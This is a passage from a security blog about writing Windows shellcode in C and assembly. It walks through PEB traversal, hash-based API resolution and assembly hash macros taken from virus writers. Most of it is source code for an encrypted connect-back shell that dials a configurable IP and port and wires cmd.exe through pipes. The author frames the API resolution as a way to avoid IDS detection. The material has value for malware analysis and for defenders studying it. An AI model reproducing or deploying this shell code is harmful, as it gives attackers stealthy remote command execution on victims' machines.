} IMAGE_THUNK_DATA32;
typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32;

In the code, I skip entries that are imported by ordinal.

The AddressOfData from OriginalFirstThunk is an RVA that points to an IMPORT_BY_NAME structure.

The Function field from FirstThunk points to actual address of API function we’re searching for.

Import By Name

Since we’re not importing by ordinal, we don’t care about the hint field, just the name which is null terminated API string.

typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    BYTE    Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint
  • Contains an index into the export table of the DLL the function resides in. This field is for use by the PE loader so it can look up the function in the DLL’s export table quickly.This value is not essential and some linkers may set the value in this field to 0.

  • Name
  • Contains the name of the import function. The name is an ASCIIZ string. Note that Name’s size is defined as byte but it’s really a variable-sized field. It’s just that there is no way to represent a variable-sized field in a structure. The structure is provided so that you can refer to the data structure with descriptive names.

The following code will search import address table for API address using CRC-32C hash of DLL and API strings.

LPVOID search_imp(LPVOID base, DWORD hash)
{
  DWORD                    dll_h, i, rva;
  PIMAGE_IMPORT_DESCRIPTOR imp;
  PIMAGE_THUNK_DATA        oft, ft;
  PIMAGE_IMPORT_BY_NAME    ibn;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PIMAGE_DATA_DIRECTORY    dir;
  PCHAR                    dll;
  LPVOID                   api_adr=NULL;
  
  dos = (PIMAGE_DOS_HEADER)base;
  nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
  rva = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
  
  // if no import table, return
  if (rva==0) return NULL;

  imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
  
  for (i=0; api_adr==NULL; i++) 
  {
    if (imp[i].Name == 0) return NULL;
    
    dll   = RVA2VA(PCHAR, base, imp[i].Name);
    dll_h = crc32c(dll); 
    
    rva   = imp[i].OriginalFirstThunk;
    oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
    
    rva   = imp[i].FirstThunk;
    ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
        
    for (;; oft++, ft++) 
    {
      if (oft->u1.Ordinal == 0) break;
      // skip import by ordinal
      if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
      
      rva = oft->u1.AddressOfData;
      ibn = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
      
      if ((crc32c(ibn->Name) + dll_h) == hash) {
        api_adr = (LPVOID)ft->u1.Function;
        break;
      }
    }
  }
  return api_adr;
}

The assembly follows same alogorithm above but with some optimizations.

; in: ebx = base of module to search
;     ecx = hash to find
;
; out: eax = api address resolved in IAT
;
search_impx:
    xor    eax, eax    ; api_adr = NULL
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]
    add    eax, 8     ; add 8 for import directory

    ; eax = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    eax, [ebx+eax+78h]
    test   eax, eax
    jz     imp_l2

    lea    ebp, [eax+ebx]
imp_l0:
    mov    esi, ebp      ; esi = current descriptor
    lodsd                ; OriginalFirstThunk +00h
    xchg   eax, edx      ; temporarily store in edx
    lodsd                ; TimeDateStamp      +04h
    lodsd                ; ForwarderChain     +08h
    lodsd                ; Name               +0Ch
    test   eax, eax
    jz     imp_l2        ; if (Name == 0) goto imp_l2;

    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax

    lodsd                 ; FirstThunk
    mov    ebp, esi       ; ebp = next descriptor

    lea    esi, [edx+ebx] ; esi = OriginalFirstThunk + base
    lea    edi, [eax+ebx] ; edi = FirstThunk + base
imp_l1:
    lodsd                 ; eax = oft->u1.Function, oft++;
    scasd                 ; ft++;
    test   eax, eax       ; if (oft->u1.Function == 0)
    jz     imp_l0         ; goto imp_l0
    js     imp_l1         ; oft->u1.Ordinal & IMAGE_ORDINAL_FLAG

    lea    eax, [eax+ebx+2] ; oft->Name_
    call   crc32c           ; get crc of API string

    add    eax, [esp+_edx]  ; eax = api_h + dll_h
    cmp    [esp+_ecx], eax  ; found match?
    jne    imp_l1

    mov    eax, [edi-4]     ; ft->u1.Function
imp_l2:
    mov    [esp+_eax], eax
    popad
    ret

Process Environment Block

Perhaps this part should precede everything else?

Another “advancement” arrived with the publication of Gaining important datas from PEB under NT boxes by Ratter/29A in 2002. There was a better way to obtain base address of KERNEL32.DLL simply by reading it from the PEB.

Here I’m using structures from Matt Graeber’s PIC_Bindshell

LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  LPVOID                   api_adr=NULL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && api_adr == NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    api_adr=search_imp(dte->DllBase, dwHash);
  }
  return api_adr;
}

The assembly is purely based on same algorithm but with some minor optimizations.

; LPVOID get_apix(DWORD hash);
get_apix:
_get_apix:
    pushad
    mov    ecx, [esp+32+4] ; ecx = hash
    push   30h
    pop    eax

    mov    eax, [fs:eax]  ; eax = (PPEB) __readfsdword(0x30);
    mov    eax, [eax+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
    jmp    gapi_l1
gapi_l0:
    call   search_expx
    test   eax, eax
    jnz    gapi_l2

    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
gapi_l1:
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
    test   ebx, ebx
    jnz    gapi_l0
    xchg   eax, ebx
gapi_l2:
    mov    [esp+_eax], eax
    popad
    ret

Hash algorithm

For both examples, I use CRC-32C checksum. The C stands for Castagnoli polynomial. I’ve used it simply because there were no collisions for 80,000 API tested. Some existing hash algorithms provide “good enough” results but the advantage of using CRC-32C is that it is now supported by INTEL cpus since the release of SSE4.2

It should be clear however that the OR operation of bytes with 0x20 is not part of the CRC-32C specification. This is only here to convert strings to lowercase before hashing. Sometimes kernel32.dll can appear as uppercase so it should be converted to lowercase.

In the Metasploit code, the module is converted to uppercase instead.

uint32_t crc32c(const char *s)
{
  int i;
  uint32_t crc=0;
  
  do {
    crc ^= (uint8_t)(*s++ | 0x20);
    
    for (i=0; i<8; i++) {
      crc = (crc >> 1) ^ (0x82F63B78 * (crc & 1));
    }
  } while (*(s - 1) != 0);
  return crc;
}

Here’s the code using built in instruction.

;
    xor    eax, eax
    cdq
crc_l0:
    lodsb
    or     al, 0x20
    crc32  edx, al
    cmp    al, 0x20
    jns    crc_l0

Here’s code for CPUs without the support for SSE4.2

; in: eax = s
; out: crc-32c(s)
;
crc32c:    
    pushad
    xchg   eax, esi          ; esi = s
    xor    eax, eax          ; eax = 0
    cdq                      ; edx = 0
crc_l0:
    lodsb                    ; al = *s++ | 0x20
    or     al, 0x20
    xor    dl, al            ; crc ^= c
    push   8
    pop    ecx    
crc_l1:
    shr    edx, 1            ; crc >>= 1
    jnc    crc_l2
    xor    edx, 0x82F63B78
crc_l2:
    loop   crc_l1
    sub    al, 0x20          ; until al==0
    jnz    crc_l0    
    mov    [esp+_eax], edx
    popad
    ret

Of course, CRC-32C is not collision resistant. In some cases, you might need to consider using a cryptographic hash algorithm. The smallest I can think of would be CubeHash by Daniel Bernstein.

Although, you could also use a tiny block or stream cipher to encrypt the strings and truncate the ciphertext to 32 or 64-bits. Not sure how collision resistant that would be but it’s worth exploring.

Summary

Parsing the import and export tables isn’t a really difficult task. With all the sources and documentation available, there’s really no excuse to avoid using either in a PIC. Using hardcoded API or looking up by ordinal are recipe for a disaster.

By writing your code in C first and generating assembly output with /FAs switch of MSVC, this should make parsing in assembly much easier to understand.

getapi.c contains code in C to locate API by CRC-32C hash. x86.asm and x64.asm contain the code in assembly to locate API by CRC-32C hash.

Posted in assembly, programming, shellcode, windows | Tagged , , , , , , , , | 2 Comments

Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

Introduction

This won’t be a tutorial on writing shellcode although you might glean something useful from the source code when writing your own PIC in C. This is a PIC (Position Independent Code) for the Windows Operating System written in C with some additional assembly code to handle stack limit issues. There are C arrays of the assembly code for x86 here and for x64 here. You must change the IP address from 127.0.0.1 and port number 1234 if testing for remote systems.

The idea of writing windows shellcodes with C is nothing new and was demonstrated by a number of people already. AFAIK, the first example of this was shown by Didier Stevens in his 2010 article for hakin9 magazine simply called Writing WIN32 Shellcode With a C-compiler.

Nick Harbour also discusses the idea in Writing Shellcode with a C Compiler and Matt Graeber shows how to build a bind shell in his article Writing Optimized Windows Shellcode in C which I’ve borrowed some ideas and code from for my own PIC.

Just this year, a Shellcode Compiler was released which can compile a script into assembly. Of course there are other source codes out there such as this and even a c++ example such as this taking advantage of the constexpr feature.

Apologies to anyone who has been involved with this subject that I missed.

In March this year, I wrote a 4 part series on some simple interactive “shells” for the windows operating system and the PIC client here can be used with this server which is derived from s4.c discussed in Part 4. The main difference is the PIC client and new server both use SHA-3 and AES-256 for authenticated encryption with some modular arithmetic functions to perform key exchange similar to RSA.

Those of you familiar with shellcode found in generators such as Veil, Metasploit or at online shellcode databases like Exploit Database will know they do not use encrypted communication between two hosts except if using WININET API for TLS connections or a static key with RC4.

I’ll just briefly discuss some things that are good to know when writing your own PIC in C for Windows. I’ll continue to update this as code develops.

  1. C or C++?
  2. C or ASM?
  3. Memory layout
  4. Resolving API
  5. Storing strings
  6. CPU intrinsics
  7. Big number arithmetic
  8. Authenticated Encryption
  9. Todo

C or C++?

Those of you familiar with OOP (Object Oriented Programming) languages will know what a class is and the purpose of properties and methods.

C is a POP (Procedure Oriented Programming) language which doesn’t support classes but we can emulate them using structures and the reason I’m using C and not C++ to write a PIC has nothing to do with understanding object oriented concepts. I just feel C++ is too close to Java, .NET and other managed code which all hide a lot of low level code from the programmer.

There are new features of C++ that would be invaluable for developing PICs and I encourage anyone to explore its features and not be dissuaded by my decision to use C instead.

One such feature is the constexpr specifier which is incredibly useful for generating hashes of strings at compile time whereas with C, they need to be hardcoded unless linking with some assembly code containing macros.

A structure is used in my own PIC to emulate a class since most of the functions must be resolved at runtime. This structure is passed to each procedure so that it can access what I’ll refer to in future as global memory.

C or ASM?

Traditionally, shellcodes have always been written in assembly for the target architecture an operating system runs on. But as the hardware technology advanced over the last 20 years, so did complexity of operating systems and there was also the birth of new languages designed to to be more cost effective for a business. The consequence of these advancements led to fewer and fewer people writing applications in assembly since the hardware no longer suffered limitations of early personal computers.

RAM and ROM space are no longer a factor for the majority of computing devices running an operating system. Compilers are efficient at generating code either optimized for speed or size and high level languages for the most part offer the ability to rapidly develop applications with chance of fewer bugs. Writing assembly today is largely confined to microcomputing devices such as the Atmel AVR 8-bit and 32-bit Microcontrollers.

As someone that’s programmed with both C and ASM on and off for some years now, there was a time when I thought assembly was the only language for writing shellcode. But the kinds of shellcode I was writing back then were very simple and there wasn’t any consideration for information transmitted between two systems being compromised by a third party. So when I decided to try write shellcode that used encryption, i knew there would be a lot of code involved and that it would be a nightmare to debug so i opted to write it in C first just to get something working.

So the codes I wrote in the past were small but this PIC can exceed 5KB once extracted from binary which is something I really wouldn’t want to write by hand although it’s safe to assume an assembly version is likely to be at least 50% smaller.

For a PIC like this using encryption of packets, it’s certainly doable to implement the entire thing in Assembly but I can imagine it being an unpleasant experience. The purpose of the Asmcodes series was essentially to evaluate potential cryptographic primitives for shellcode.

I think it would be wise to develop a PIC in C first before considering an assembly implementation. Once you’ve ironed out any problems, that will make writing assembly much easier.

Memory layout

A general layout of our global memory is required for data and API addresses. API addresses are likely to consume less space than data so I would recommend placing a structure for API at the very beginning of allocated memory.

For this particular code, we use some (but not all) 28 API which requires 112 bytes on x86 and 224 bytes for x64. I’ll explain later why some are not currently used, it’s mostly for legacy reasons.

They are resolved by 32-bit hash from the PEB (Process Environment Block) that contains among many other things a list of DLL (Dynamic-link Libraries) loaded into our target process.

We identify the variables that will be required to multiple functions and declare these in a structure I’ve simply called v_tbl. (I may need to revise this as some may think it means virtual table)

Pointers to API addresses are stored in a structure call f_tbl and this is then placed inside another structure with v_tbl to define our global memory.

Anyone that’s ever looked at disassembly for a C++ program will notice that each class object or instance of an object is passed to each class method. I’ve adopted a similar approach in C except you can visibly see the parameter passed to each function in source code.

If you’re familiar with object oriented programming, you can view the v_tbl structure as properties of a class and the f_tbl structure as methods. So you might be asking why not just have all memory space in one area? There’s a reason to separate the two and it’s mainly to do with reducing opcode sizes.

In assembly, it would be ideal to store API at start of structure and data variables at end so that we’re accessing the API with the least amount of bytes.

It may be possible to use a free unused or reserved slot in the TEB (Thread Environment Block) or PEB (Process Environment Block) which we can then access from each function through the FS or GS selector depending on version of Windows but I have not investigated this.

Another issue is the use of stack for storing data. cs32.asm and cs64.asm are required to allocate large blocks of stack memory.

As a general rule I would advise you minimize amount of stack allocated to avoid crashing on some systems. In future I will most likely use the heap for global memory instead of stack.

Data structure

The v_tbl represents our variables which are for the most part required by more than one function, but not all. Actually, this could be reduced but it’ll do for now.

// shellcode data structure
typedef struct _sc_v_tbl_t {
  spp_blk             blk;
  SOCKET              s;      // socket
  HANDLE              out1;   // CreateNamedPipe
  HANDLE              in0;    // CreatePipe read
  HANDLE              in1;    // CreatePipe write
  HANDLE              out0;   // CreateFile
  // event handles start here
  HANDLE              evt0;   // WSACreateEvent
  HANDLE              evt1;   // CreateEvent for cmd.exe
  PROCESS_INFORMATION pi;
  DWORD               evt_cnt;
  DWORD               secure;
  HCRYPTPROV          hProv;
  spp_tek             tek;
  aes_ctx             ctx;
} v_tbl;

Code structure

The f_tbl represents our ‘function table’ which is just a structure to hold addresses of each API required by all functions. Even if the application space does not use TCP, the PIC will initialize Windows Sockets before attempting to make an outgoing connection.

// api table structure
typedef struct _sc_f_tbl_t {
  union {
    LPVOID api[28];
    struct {
      // kernel32
      CreateNamedPipe_t                pCreateNamedPipe;
      CreatePipe_t                     pCreatePipe;
      CreateFile_t                     pCreateFile;
      WriteFile_t                      pWriteFile;
      ReadFile_t                       pReadFile;
      GetOverlappedResult_t            pGetOverlappedResult;
      CreateProcess_t                  pCreateProcess;
      TerminateProcess_t               pTerminateProcess;
      CreateEvent_t                    pCreateEvent;
      GetTickCount_t                   pGetTickCount;
      GetLastError_t                   pGetLastError;
      CloseHandle_t                    pCloseHandle;
      WaitForMultipleObjects_t         pWaitForMultipleObjects;
      Wow64DisableWow64FsRedirection_t pWow64DisableWow64FsRedirection;
      GetFileSizeEx_t                  pGetFileSizeEx;
      // ws2_32
      socket_t                         psocket;
      connect_t                        pconnect;
      send_t                           psend;
      recv_t                           precv;
      closesocket_t                    pclosesocket;
      ioctlsocket_t                    pioctlsocket;
      WSAEventSelect_t                 pWSAEventSelect;
      WSAEnumNetworkEvents_t           pWSAEnumNetworkEvents;
      WSACreateEvent_t                 pWSACreateEvent;
      WSAStartup_t                     pWSAStartup;
      // advapi32
      CryptAcquireContextA_t           pCryptAcquireContext;
      CryptGenRandom_t                 pCryptGenRandom;
      CryptReleaseContext_t            pCryptReleaseContext;
    };
  };
} f_tbl;

Both f_tbl and v_tbl are placed in one structure and this represents our global memory.

typedef struct sc_tbl_t {
  f_tbl f; // function table  (code section)
  v_tbl v; // variables table (data section)
} sc_tbl;

Resolving API

A clever and clean way to resolve and invoke an API which is now part of the Metasploit project is originally based on this shellcode for windows which was used for a CTF by some Spanish dudes in July 2008 well before it was modified and added to Metasploit repository.

While it’s a neat way to call API, some IDS software now easily recognize this as being shellcode and so I’ve reverted back to the traditional method of calling API from C using code based on GetProcAddressWithHash.h from Matt Graeber’s PIC_Bindshell which can also support resolving 64-bit API.

The main modification is how hash of DLL is generated and resolving forward references. Instead of using the Unicode string of DLL in PEB, it’s calculated from the DLL header. In addition to this, if we have a forward reference, a new hash for DLL and API is generated before attempting to resolve.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, i, j;
  DWORD                    idx, rva, api_h, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll, p;
  LPVOID                   api_adr=0;
  CHAR                     dll_name[64], api_name[128];
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    // calculate hash of DLL string
    dll_h = api_hash(dll);
    
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // add to DLL hash and compare
      if (api_hash(api)+dll_h == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        // is this a forward reference?
        if ((PBYTE)api_adr >= (PBYTE)exp &&
            (PBYTE)api_adr <  (PBYTE)exp + 
            dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
        {
          DEBUG_PRINT("%08X is forwarded to %s", 
              dwHash, api_adr);
              
          // copy DLL name to buffer
          for (i=0, p=api_adr; p[i] != 0 && 
              i < sizeof(dll_name)-4; i++) 
          {
            dll_name[i] = p[i];
            if (p[i] == '.') break;
          }
          dll_name[i+1] = 'D';
          dll_name[i+2] = 'L';
          dll_name[i+3] = 'L';
          dll_name[i+4] = 0;
          // copy API name to buffer
          for(j=0; p[++i] != 0 && 
              j < sizeof(api_name)-1; j++) 
          { 
            api_name[j] = p[i]; 
          }
          api_name[j] = 0;
          // calculate hash for DLL and API
          dll_h = api_hash(dll_name);
          api_h = api_hash(api_name);
          DEBUG_PRINT("hash for %s and %s = %08X", 
              dll_name, api_name, dll_h + api_h);
          // now try again
          api_adr = getapi(dll_h + api_h);
          // if we don't have at this point, bail out.
        }
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

The initialization resolves a table of API hashes and stores in f_tbl on the stack.

/**F*********************************************
 *
 * entrypoint of PIC
 *
 ************************************************/
#ifdef XALONE
void mainCRTStartup(void)
#else
void entrypoint(void)
#endif
{
  WSADATA            wsa;
  struct sockaddr_in sin;
  sc_tbl             x;
  DWORD              i, cnt;
  int                r;
  char               ws2_32[]={'w','s','2','_','3','2','\0'};
  char               adv_32[]={'a','d','v','a','p','i','3','2','\0'};
  LoadLibrary_t      pLoadLibrary;

  DWORD api_tbl[28] = 
{ // kernel32
  0x9B1D3EA9, 0xE6FA65BF, 0x0BEEEE0C, 0xD7F74F5F,
  0xE0E73F55, 0x5874B33B, 0xB6A0D8D1, 0x09228FC6,
  0xC0F188F0, 0xA7C0D163, 0x2608EFA5, 0x9FEA6E52,
  0xB4682C63, 0xCA1BB2C6, 0x727CC43E,
  // ws2_32
  0x9D920334, 0xB50DF1B2, 0x3DD3116A, 0x3B7B117C,
  0xCE2971AD, 0x424589CE, 0x929726BE, 0x272C063F,
  0x26EF0516, 0xB0E0E991,
  // advapi32
  0x86904799, 0xBD78D522, 0xB635E033 };
  
  // zero initialize memory
  memset ((uint8_t*)&x, 0, sizeof(x));
  
  // load required modules just in case unavailable in PEB
  // get address for LoadlibraryA
  pLoadLibrary=(LoadLibrary_t)getapi(0x7C3B28ED);
  
  // load ws2_32 
  pLoadLibrary(ws2_32);
  
  // load advapi32
  pLoadLibrary(adv_32);
  
  // resolve our api addresses
  for (i=0; i<sizeof(api_tbl)/sizeof(DWORD); i++) {
    x.f.api[i]=getapi(api_tbl[i]);
    if (x.f.api[i] == NULL) {
      DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
          api_tbl[i]);
      //return;
    }
  }
  
  // initialize winsock
  x.f.pWSAStartup (MAKEWORD(2, 2), &wsa);
  
  // initialize crypto
  x.v.hProv=0;
  
  x.f.pCryptAcquireContext (&x.v.hProv, 
      NULL, NULL, PROV_RSA_AES, 
      CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
      
  // create tcp socket
  x.v.s=x.f.psocket (AF_INET, 
      SOCK_STREAM, IPPROTO_TCP);
      
  // initialize network address, this requires changing before deployment
  sin.sin_port             = HTONS(1234);
  sin.sin_family           = AF_INET;
  sin.sin_addr.S_un.S_addr = 0x0100007F; // 127.0.0.1
  
  // connect to server
  r=x.f.pconnect (x.v.s, 
      (const struct sockaddr*)&sin, sizeof (sin));
  
  if (!r)
  {
    // perform key exchange
    key_xchg(&x);
    // execute dispatcher
    dispatch(&x);
  }
  // close socket
  x.f.pclosesocket (x.v.s);
  // release crypto context
  x.f.pCryptReleaseContext(x.v.hProv, 0);
  
  // cleanup and exit, not used in final code
  //WSACleanup();
  //return 0;
}

API hash algorithm

The api_hash algorithm used in shellcode uses exact same as that found in metasploit except the strings are converted to lowercase before hashing. Although the following works, it is exceptionally slower and delays running shellcode resolving API up to 10 seconds on my system.

// generate sha3-256 hash of dll and api
uint32_t api_hash(char dll[], char api[])
{ 
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX ctx;
  int      i;
  char     c;
  uint8_t  f[64+1]; 
  uint32_t s = 0x9e3779b9UL; // change to something unique
    
  SHA3_Init(&ctx, SHA3_256);         // create 256-bit hash
  SHA3_Update(&ctx, &s, sizeof(s));  // unique secret

  // copy dll converted to lowercase
  for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
    f[i] = (dll[i] | 0x20);
  }
  f[i] = 0;
  SHA3_Update(&ctx, f, i);
  SHA3_Update(&ctx, api, strlen(api));
  SHA3_Final(h.b, &ctx);
  
  // only return the first 32-bits
  return h.w[0];
}

If there’s a way to shorten time require to resolve hashes using SHA-3, I’ll add it later.
Here’s the new getapi function with sha3 hashing included but again it’s too slow.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, idx, rva, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll;
  LPVOID                   api_adr=0;
  
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX                 ctx1, ctx2;
  int                      i;
  uint8_t                  f[64+1]; 
  uint32_t                 s = 0x9e3779b9UL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    SHA3_Init(&ctx1, SHA3_256);   // create 256-bit hash
    SHA3_Update(&ctx1, &s, sizeof(s));  // unique secret

    // copy dll converted to lowercase
    for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
      f[i] = (dll[i] | 0x20);
    }
    f[i] = 0;
    SHA3_Update(&ctx1, f, i);
  
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // update context with api
      for (i=0; api[i] != 0; i++);
      memcpy ((uint8_t*)&ctx2, (uint8_t*)&ctx1, sizeof(SHA3_CTX));
      SHA3_Update(&ctx2, api, i);
      SHA3_Final(h.b, &ctx2);
      // add to DLL hash and compare
      if (h.w[0] == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

Storing strings

Strings must be stored as character arrays otherwise the compiler will automatically store the string and a pointer to it in the data section which we must avoid for a PIC. For example, this PIC requires socket API from ws2_32.dll and crypto API from advapi32.dll but sometimes these are not already loaded in memory. The PIC will load these 2 libraries before trying to resolve any other API at runtime which requires their names be passed to LoadLibrary API.

char ws2_32[]={'w','s','2','_','3','2','\0'};
char adv_32[]={'a','d','v','a','p','i','3','2','\0'};

CPU intrinsics

Even with /Os flag, sometimes the MSVC compiler will think you’re silly and automatically replace FOR loops with memset or memcpy depending on what the loop does. It’s slightly annoying because if I wanted to use memset or memcpy, I’d use them. Since these are external C library functions, I usually have to replace some FOR loops with intrinsics.

You could of course include your own implementation of memset and memcmp functions which might be a better idea but what I normally do is try using the intrinsic directive which should automatically use STOSB/STOSD for memset, MOVSB/MOVSD for memcpy and CMPSB/CMPSD for memcmp.

#pragma intrinsic(memcmp, memcpy, memset)

However, Microsoft has this to say:

The compiler may call the function and not replace the function call with inline instructions, if it will result in better performance.

If the compiler still doesn’t play ball, I’ll define the following.

#define memcpy(x,y,z) __movsb(x,y,z)
#define memmove(x,y,z) __movsb(x,y,z)
#define memset(x,y,z) __stosb(x,y,z)

This usually fixes the issue but when the compiler is stubborn and refuses to substitute memset/memcpy I replace both C functions with either __stosb or __movsb directly.

If all that fails! Consider using an older version of MSVC or try mingw. I’m using MSVC 2010 and believe MSVC 2013 and later versions have dropped support for replacing memcmp with REP CMPSB even when /Os is used.

Any other problems might be related to bit rotations used for encryption operations although any decent compiler will avoid using SHR/SHL/OR to perform a bit rotation. When it doubt, try using _rotl or _rotr. For byte swapping use _bswap (INTEL compiler) or _byteswap_ulong (MSVC).

Include the following if switching between MSVC or INTEL compiler.

#ifdef _MSC_VER
#include <intrin.h>
#else
#include <x86intrin.h>
#endif

Compiler Flags

The only flags I’ve used attempt to reduce code and omit stack security checking.

@echo off
yasm -fwin32 cs32.asm -ocs32.obj
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- aes.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- sha3.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- modexp.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- -DXALONE spz.c
link /order:@order.txt /base:0 spz.obj sha3.obj aes.obj modexp.obj cs32.obj -subsystem:console -nodefaultlib kernel32.lib -stack:0x100000,0x100000
xbin spz.exe .text
del *.obj

Assembly macros for calculating hashes

Assemblers with macro support provide a way to compute hashes of strings at assembly time. The earliest examples of this were demonstrated in viruses computing CRC hashes of API strings.

The following macro for example is from a virus writer Vecna and based on algorithm originally proposed by LSD-PL in their winasm paper back in 2002.

hash_string macro s
  hash = 0
  len  = 0

  irpc c, <s>
    len = len + 1
  endm
  
  i = 0
  
  irpc c, <s>
    if i ne 0
      if i ne (len-1)
        hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
        hash = hash xor '&c'
      endif
    endif
    i = i + 1
  endm
endm

An even more clever way to generate MD5 hashes of strings was demonstrated by talented coder drizz. The source of this is too complicated to include here but for those curious, have a look here.

Arithmetic Functions for large integers

